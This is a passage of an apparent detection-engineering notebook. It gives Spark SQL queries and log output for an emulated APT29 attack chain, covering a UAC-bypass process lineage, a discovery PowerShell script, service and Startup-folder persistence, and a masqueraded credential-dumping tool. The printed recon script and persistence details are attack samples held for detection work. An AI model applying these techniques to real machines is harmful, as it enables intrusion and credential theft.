SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
  FROM apt29Host d
  INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
  ) c
  ON d.ProcessId = c.NewProcessId
  WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND d.NewProcessName LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%netusergetlocalgroups%"

'''
)
# Print up to 100 matches, untruncated, one field per line.
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

4.C.12. Execution through API

Procedure: Executed API call by reflectively loading Netapi32.dll

Criteria: The NetUserGetLocalGroups API function loaded into powershell.exe from Netapi32.dll

Detection Type:Telemetry(Correlated)

Query ID:53CEF026-66EF-4B26-B5C9-10D4BBA3F9E8

# 4.C.12 — Sysmon EID 7 load of netapi32.dll by the powershell.exe at the end
# of the sdclt.exe -> control.exe -> high-integrity child chain.
# This query is textually identical to the 4.C.10 query, and it returns the
# same image-load record: a single DLL load event cannot distinguish the
# NetUserGetGroups call (4.C.10) from the NetUserGetLocalGroups call
# (4.C.12), so both criteria are evidenced by the same telemetry. The
# function-level distinction is only visible in the 4104 script block
# queries. All joins are on ProcessGuid.
df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
    SELECT d.ProcessGuid
    FROM apt29Host d
    INNER JOIN (
      SELECT a.ProcessGuid, a.ParentProcessGuid
      FROM apt29Host a
      INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(Image) LIKE "%control.exe"
            AND LOWER(ParentImage) LIKE "%sdclt.exe"
      ) b
      ON a.ParentProcessGuid = b.ProcessGuid
      WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND a.EventID = 1
        AND a.IntegrityLevel = "High"
    ) c
    ON d.ParentProcessGuid= c.ProcessGuid
    WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND d.EventID = 1
      AND d.Image LIKE '%powershell.exe'
) e
ON f.ProcessGuid = e.ProcessGuid
WHERE f.Channel = "Microsoft-Windows-Sysmon/Operational"
AND f.EventID = 7
AND LOWER(f.ImageLoaded) LIKE "%netapi32.dll"

'''
)
# Print up to 100 matches, untruncated, one field per line.
df.show(100,truncate = False, vertical = True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Image loaded:
RuleName: -
UtcTime: 2020-05-02 03:04:04.361
ProcessGuid: {47ab858c-e23d-5eac-c603-000000000400}
ProcessId: 3876
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ImageLoaded: C:\Windows\System32\netapi32.dll
FileVersion: 10.0.18362.1 (WinBuild.160101.0800)
Description: Net Win32 API DLL
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: NetApi32.DLL
Hashes: SHA1=7DFDD188B30162DAA87FDD3E5B7A55C80CD839F1,MD5=86A9DF3FA9D5FCAC8EF57601FCCD78F9,SHA256=F8CDA38FD3FF371E772875EA657A37662321EBB7AD8D6978DBCCCA7FC6DB64F1,IMPHASH=7D4E1695394CF47BD397AFD45A40E55D
Signed: true
Signature: Microsoft Windows
SignatureStatus: Valid 

5.A.1. New Service

Procedure: Created a new service (javamtsup) that executes a service binary (javamtsup.exe) at system startup

Criteria: powershell.exe creating the Javamtsup service

Detection Type:Telemetry(Correlated)

Query ID:A16CE10D-6EE3-4611-BE9B-B023F36E2DFF

# 5.A.1 — Registry side of the service creation.
# Sysmon EID 12 (key create/delete), 13 (value set) and 14 (key/value rename)
# where either the key path or the written value mentions "javamtsup".
# What the output shows: the key HKLM\System\CurrentControlSet\Services\javamtsup
# and its Type/Start/ErrorControl/ImagePath/DisplayName/ObjectName values are
# all written by services.exe (PID 720), not by powershell.exe — the Service
# Control Manager performs the registry writes on behalf of the caller.
# This query therefore proves that the service was registered
# (Start = 0x2 is SERVICE_AUTO_START, ObjectName = LocalSystem) but cannot
# by itself attribute the creation to the PowerShell process; that link is
# made by the companion EID 4103 "New-Service" query.
# Tuning note: the filter is keyed on the emulation's service name. A reusable
# rule would instead watch for new ...\Services\*\ImagePath values pointing at
# binaries outside the expected paths, and attribute them via the caller's
# own logs as done below.
df = spark.sql(
'''
SELECT Message
FROM apt29Host
WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
  AND EventID IN (12,13,14)
  AND (LOWER(TargetObject) LIKE "%javamtsup%" OR LOWER(Details) LIKE "%javamtsup%")

'''
)
# Print up to 100 matches, untruncated, one field per line.
df.show(100,truncate = False, vertical = True)
-RECORD 0---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry object added or deleted:
RuleName: -
EventType: CreateKey
UtcTime: 2020-05-02 03:04:15.421
ProcessGuid: {47ab858c-cad9-5eac-0b00-000000000400}
ProcessId: 720
Image: C:\windows\system32\services.exe
TargetObject: HKLM\System\CurrentControlSet\Services\javamtsup                                                 
-RECORD 1---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:04:15.421
ProcessGuid: {47ab858c-cad9-5eac-0b00-000000000400}
ProcessId: 720
Image: C:\windows\system32\services.exe
TargetObject: HKLM\System\CurrentControlSet\Services\javamtsup\Type
Details: DWORD (0x00000010)                              
-RECORD 2---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:04:15.421
ProcessGuid: {47ab858c-cad9-5eac-0b00-000000000400}
ProcessId: 720
Image: C:\windows\system32\services.exe
TargetObject: HKLM\System\CurrentControlSet\Services\javamtsup\Start
Details: DWORD (0x00000002)                             
-RECORD 3---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:04:15.421
ProcessGuid: {47ab858c-cad9-5eac-0b00-000000000400}
ProcessId: 720
Image: C:\windows\system32\services.exe
TargetObject: HKLM\System\CurrentControlSet\Services\javamtsup\ErrorControl
Details: DWORD (0x00000001)                      
-RECORD 4---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:04:15.421
ProcessGuid: {47ab858c-cad9-5eac-0b00-000000000400}
ProcessId: 720
Image: C:\windows\system32\services.exe
TargetObject: HKLM\System\CurrentControlSet\Services\javamtsup\ImagePath
Details: C:\Windows\System32\javamtsup.exe          
-RECORD 5---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:04:15.421
ProcessGuid: {47ab858c-cad9-5eac-0b00-000000000400}
ProcessId: 720
Image: C:\windows\system32\services.exe
TargetObject: HKLM\System\CurrentControlSet\Services\javamtsup\DisplayName
Details: Java(TM) Virtual Machine Support Service 
-RECORD 6---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2020-05-02 03:04:15.421
ProcessGuid: {47ab858c-cad9-5eac-0b00-000000000400}
ProcessId: 720
Image: C:\windows\system32\services.exe
TargetObject: HKLM\System\CurrentControlSet\Services\javamtsup\ObjectName
Details: LocalSystem                               

Query ID:E76C4174-C24A-4CA3-9EA8-46C5286D3B6F

# 5.A.1 — Attribution of the service creation to powershell.exe via
# PowerShell Module Logging (EID 4103), correlated with the Sysmon chain.
#   b/a/d: Sysmon EID 1 chain sdclt.exe -> control.exe -> high-integrity
#          child -> powershell.exe (joined on ProcessGuid)
#   f:     Microsoft-Windows-PowerShell/Operational EID 4103 whose Payload
#          contains "new-service", joined on the numeric PID
# EID 4103 requires module logging to be enabled; with it, the Payload
# carries the cmdlet name and every bound parameter, which is why the
# output shows the service Name, BinaryPathName, DisplayName and
# StartupType=Automatic that match the registry values written by
# services.exe. The PID join (ExecutionProcessID = ProcessId) is the weak
# link — it is only as reliable as the absence of PID reuse in the window.
df = spark.sql(
'''
SELECT Payload
FROM apt29Host f
INNER JOIN (
  SELECT d.ProcessId, d.ParentProcessId
  FROM apt29Host d
  INNER JOIN (
    SELECT a.ProcessGuid, a.ParentProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
  ) c
  ON d.ParentProcessGuid= c.ProcessGuid
  WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 1
    AND d.Image LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4103
  AND LOWER(f.Payload) LIKE "%new-service%"

'''
)
# Print up to 100 matches, untruncated, one field per line (only Payload is selected).
df.show(100,truncate = False, vertical = True)
-RECORD 0---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(New-Service): "New-Service"
ParameterBinding(New-Service): name="Name"; value="javamtsup"
ParameterBinding(New-Service): name="BinaryPathName"; value="C:\Windows\System32\javamtsup.exe"
ParameterBinding(New-Service): name="DisplayName"; value="Java(TM) Virtual Machine Support Service"
ParameterBinding(New-Service): name="StartupType"; value="Automatic"
 

Query ID:AA3EF640-2720-4E8A-B86D-DFCF2FDB86BD

# 5.A.1 — Same EID 4103 "New-Service" attribution, but with the process chain
# rebuilt from Security EID 4688 instead of Sysmon.
#   b: 4688, control.exe created by sdclt.exe
#   a: 4688, children of b with MandatoryLabel S-1-16-12288 (High integrity
#      SID) and TokenElevationType %%1937 (full/elevated token)
#   d: 4688, powershell.exe children of a
#   f: PowerShell EID 4103 whose Payload contains "new-service"
# 4688 stores NewProcessId as a 0x-prefixed hex string and 4103 stores
# ExecutionProcessID as a number, so the final join strips "0x" on one side
# (split(...)[1]) and applies LOWER(hex(...)) on the other. Every hop is
# PID-keyed, so PID reuse inside the window can create false links; prefer
# the Sysmon/ProcessGuid variant where both sources are available.
df = spark.sql(
'''
SELECT Payload
FROM apt29Host f
INNER JOIN (
  SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
  FROM apt29Host d
  INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
  ) c
  ON d.ProcessId = c.NewProcessId
  WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND d.NewProcessName LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4103
  AND LOWER(f.Payload) LIKE "%new-service%"

'''
)
# Print up to 100 matches, untruncated, one field per line.
df.show(100,truncate = False, vertical = True)
-RECORD 0---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(New-Service): "New-Service"
ParameterBinding(New-Service): name="Name"; value="javamtsup"
ParameterBinding(New-Service): name="BinaryPathName"; value="C:\Windows\System32\javamtsup.exe"
ParameterBinding(New-Service): name="DisplayName"; value="Java(TM) Virtual Machine Support Service"
ParameterBinding(New-Service): name="StartupType"; value="Automatic"
 

5.B.1. Registry Run Keys / Startup Folder

Procedure: Created a LNK file (hostui.lnk) in the Startup folder that executes on login

Criteria: powershell.exe creating the file hostui.lnk in the Startup folder

Detection Type:Telemetry(Correlated)

Query ID:611FCA99-97D0-4873-9E51-1C1BA2DBB40D

# 5.B.1 — Startup-folder persistence: Sysmon EID 11 (FileCreate) emitted by the
# powershell.exe at the end of the sdclt.exe -> control.exe -> high-integrity
# child chain, where the created path is under the all-users Startup folder.
# All joins are on ProcessGuid.
# Escaping: the RLIKE pattern passes through two string parsers before the
# regex engine sees it. Each run of 8 backslashes in this (non-raw) Python
# literal becomes 4 in the SQL text, Spark's SQL literal parsing (default
# spark.sql.parser.escapedStringLiterals=false) turns those into 2, and the
# Java regex "\\" then matches one literal path separator. Use a raw
# string or fewer backslashes only if you also change the other layer.
# Scope note: the pattern is anchored on ProgramData\...\Start Menu\Programs\StartUp,
# i.e. the machine-wide Startup folder; a per-user Startup folder path would
# not match this pattern and needs its own branch.
df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
    SELECT d.ProcessGuid
    FROM apt29Host d
    INNER JOIN (
      SELECT a.ProcessGuid, a.ParentProcessGuid
      FROM apt29Host a
      INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(Image) LIKE "%control.exe"
            AND LOWER(ParentImage) LIKE "%sdclt.exe"
      ) b
      ON a.ParentProcessGuid = b.ProcessGuid
      WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND a.EventID = 1
        AND a.IntegrityLevel = "High"
    ) c
    ON d.ParentProcessGuid= c.ProcessGuid
    WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND d.EventID = 1
      AND d.Image LIKE '%powershell.exe'
) e
ON f.ProcessGuid = e.ProcessGuid
WHERE f.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND f.EventID = 11
    AND f.TargetFilename RLIKE '.*\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\StartUp.*'

'''
)
# Print up to 100 matches, untruncated, one field per line.
df.show(100,truncate = False, vertical = True)
-RECORD 0------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | File created:
RuleName: -
UtcTime: 2020-05-02 03:04:23.681
ProcessGuid: {47ab858c-e23d-5eac-c603-000000000400}
ProcessId: 3876
Image: C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\hostui.lnk
CreationUtcTime: 2020-05-02 03:04:23.681 

6.A.1. Credentials in Files

Procedure: Read the Chrome SQL database file to extract encrypted credentials

Criteria: accesschk.exe reading files within %APPDATALOCAL%\Google\chrome\user data\default\

Detection Type:None(None)

6.A.2. Credential Dumping

Procedure: Executed the CryptUnprotectedData API call to decrypt Chrome passwords

Criteria: accesschk.exe executing the CryptUnprotectedData API

Detection Type:None(None)

6.A.3. Masquerading

Procedure: Masqueraded a Chrome password dump tool as accesscheck.exe, a legitimate Sysinternals tool

Criteria: Evidence that accesschk.exe is not the legitimate Sysinternals tool

Detection Type:Telemetry(Correlated)

Query ID:0A19F9B7-5E17-47E5-8015-29E9ABC09ADC

# 6.A.3 — Masquerading evidence for accesschk.exe.
# Extends the Sysmon chain one more hop:
#   b/a/d: EID 1 chain sdclt.exe -> control.exe -> high-integrity child
#          -> powershell.exe
#   f:     EID 1, child of that powershell.exe whose Image contains "accesschk"
#   h:     EID 7 in that child where the loaded image is the accesschk binary
#          itself (the main module load is logged as an image load)
# All joins are on ProcessGuid. EID 7 is used rather than EID 1 because it
# carries the module's signature and version fields.
# What makes the hit meaningful is in the returned record, not the WHERE
# clause: Signed=false, SignatureStatus=Unavailable and empty
# FileVersion/Description/Product/Company/OriginalFileName, none of which is
# expected for a genuine Sysinternals binary. The query does not filter on
# those fields, so the analyst has to read them; a production rule would
# add a predicate such as `AND h.Signed = "false"` — confirm that Signed is
# a parsed column in apt29Host before relying on it.
df = spark.sql(
'''
SELECT Message
FROM apt29Host h
INNER JOIN (
    SELECT f.ProcessGuid
    FROM apt29Host f
    INNER JOIN (
      SELECT d.ProcessGuid, d.ParentProcessGuid
      FROM apt29Host d
      INNER JOIN (
        SELECT a.ProcessGuid, a.ParentProcessGuid
        FROM apt29Host a
        INNER JOIN (
          SELECT ProcessGuid
          FROM apt29Host
          WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
              AND EventID = 1
              AND LOWER(Image) LIKE "%control.exe"
              AND LOWER(ParentImage) LIKE "%sdclt.exe"
        ) b
        ON a.ParentProcessGuid = b.ProcessGuid
        WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
          AND a.EventID = 1
          AND a.IntegrityLevel = "High"
      ) c
      ON d.ParentProcessGuid= c.ProcessGuid
      WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND d.EventID = 1
        AND d.Image LIKE '%powershell.exe'
    ) e
    ON f.ParentProcessGuid = e.ProcessGuid
    WHERE f.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND f.EventID = 1
      AND LOWER(f.Image) LIKE '%accesschk%'
) g
ON h.ProcessGuid = g.ProcessGuid
WHERE h.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND EventID = 7
    AND LOWER(ImageLoaded) LIKE '%accesschk%'

'''
)
# Print up to 100 matches, untruncated, one field per line.
df.show(100,truncate = False, vertical = True)
-RECORD 0------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Image loaded:
RuleName: -
UtcTime: 2020-05-02 03:04:34.959
ProcessGuid: {47ab858c-e342-5eac-d703-000000000400}
ProcessId: 9204
Image: C:\Program Files\SysinternalsSuite\accessChk.exe
ImageLoaded: C:\Program Files\SysinternalsSuite\accessChk.exe
FileVersion: -
Description: -
Product: -
Company: -
OriginalFileName: -
Hashes: SHA1=691E81A8FA152F68FB8ACEFE8F59EA41DC995880,MD5=44F96457ADEB95AFD3F5457082D44538,SHA256=3247D21BC9BBBD8DF670A82E24BE754A2D58D2511EE64AFF0A1E3756CD288236,IMPHASH=8A672B6C29F8A80FC01C6E44A3CDEE82
Signed: false
Signature: -
SignatureStatus: Unavailable 

Detection Type:General(Correlated)

Query ID:1FCE98FC-1FF9-41CB-9C25-0235729A2B01

# 6.A.3 (General) — Same accesschk.exe image-load query as the Telemetry
# entry for this sub-step; it is repeated here because the evaluation scores
# the unsigned, version-less module record as a "General" detection as well.
#   b/a/d: Sysmon EID 1 chain sdclt.exe -> control.exe -> high-integrity
#          child -> powershell.exe
#   f:     EID 1 child of that powershell.exe whose Image contains "accesschk"
#   h:     EID 7 in that child where ImageLoaded is the accesschk binary
# All joins are on ProcessGuid. The unqualified EventID/ImageLoaded in the
# outer WHERE resolve to h, since subquery g exposes only ProcessGuid.
# The masquerading evidence (Signed=false, SignatureStatus=Unavailable, no
# version metadata) is read from the returned record rather than enforced
# in the WHERE clause; tighten with a signature predicate for production use
# after confirming those fields are parsed columns in apt29Host.
df = spark.sql(
'''
SELECT Message
FROM apt29Host h
INNER JOIN (
    SELECT f.ProcessGuid
    FROM apt29Host f
    INNER JOIN (
      SELECT d.ProcessGuid, d.ParentProcessGuid
      FROM apt29Host d
      INNER JOIN (
        SELECT a.ProcessGuid, a.ParentProcessGuid
        FROM apt29Host a
        INNER JOIN (
          SELECT ProcessGuid
          FROM apt29Host
          WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
              AND EventID = 1
              AND LOWER(Image) LIKE "%control.exe"
              AND LOWER(ParentImage) LIKE "%sdclt.exe"
        ) b
        ON a.ParentProcessGuid = b.ProcessGuid
        WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
          AND a.EventID = 1
          AND a.IntegrityLevel = "High"
      ) c
      ON d.ParentProcessGuid= c.ProcessGuid
      WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND d.EventID = 1
        AND d.Image LIKE '%powershell.exe'
    ) e
    ON f.ParentProcessGuid = e.ProcessGuid
    WHERE f.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND f.EventID = 1
      AND LOWER(f.Image) LIKE '%accesschk%'
) g
ON h.ProcessGuid = g.ProcessGuid
WHERE h.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND EventID = 7
    AND LOWER(ImageLoaded) LIKE '%accesschk%'

'''
)
df.show